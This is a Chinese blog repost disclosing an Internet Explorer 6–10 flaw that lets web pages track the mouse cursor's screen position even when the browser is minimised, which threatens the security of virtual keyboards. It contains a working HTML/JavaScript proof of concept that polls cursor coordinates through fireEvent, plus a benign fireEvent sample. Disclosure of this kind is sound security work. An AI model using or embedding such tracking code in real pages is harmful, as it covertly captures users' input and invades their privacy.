国外网站最近披露了一个IE新漏洞,该漏洞允许攻击者跟踪屏幕上在任何位置的鼠标光标。这会危及到安全的虚拟键盘,让黑客如同使用键盘记录器一样,获得用户敏感信息。尽管目前已报告这个漏洞,并且广告商已将漏洞利用到数十亿次的广告展示中,但微软研究员却表示,近期无修复计划。据报道,微软目前所有支持的浏览器版本均受影响,这包括IE6、IE7、IE8、IE9和IE10。
通过利用fireEvent,触发onmousemove事件,可以完整的记录鼠标的移动路径,甚至在IE最小化或者不是当前窗口的情况下也可以获取当前鼠标坐标。PoC如下:
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 | <!DOCTYPE html>
<html>
<head>
<meta charset="utf-8" />
<title>Exploit Demo</title>
<script type="text/javascript">
window.attachEvent("onload", function() {
var detector = document.getElementById("detector");
detector.attachEvent("onmousemove", function (e) {
detector.innerHTML = e.screenX + ", " + e.screenY;
});
setInterval(function () {
detector.fireEvent("onmousemove");
}, 100);
});
</script>
</head>
<body>
<div id="detector"></div>
</body>
</html> |
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 | <HTML>
<HEAD>
<SCRIPT>
function fnFireEvents() {
div.innerText = "The cursor has moved over me!";
btn.fireEvent("onclick");
}
</SCRIPT>
</HEAD>
<BODY>
<h1>Using the fireEvent method</h1>
By moving the cursor over the DIV below, the button is clicked.
<DIV ID="div" onmouseover="fnFireEvents();">
Mouse over this!
</DIV>
<BUTTON ID="btn" ONCLICK="this.innerText='I have been clicked!'">Button</BUTTON>
</BODY>
</HTML> |
视频演示:
Reference:
IE曝网站鼠标跟踪漏洞 用户隐私遭威胁
IE(6-10)鼠标跟踪漏洞
http://v.youku.com/v_show/id_XNDg3NjIxMzA4.html
本博客很少转载他人文章,如未特别标明,均为原创,转载请注明出处:
本文出自程序人生 >> [转]IE鼠标追踪漏洞
作者:代码疯子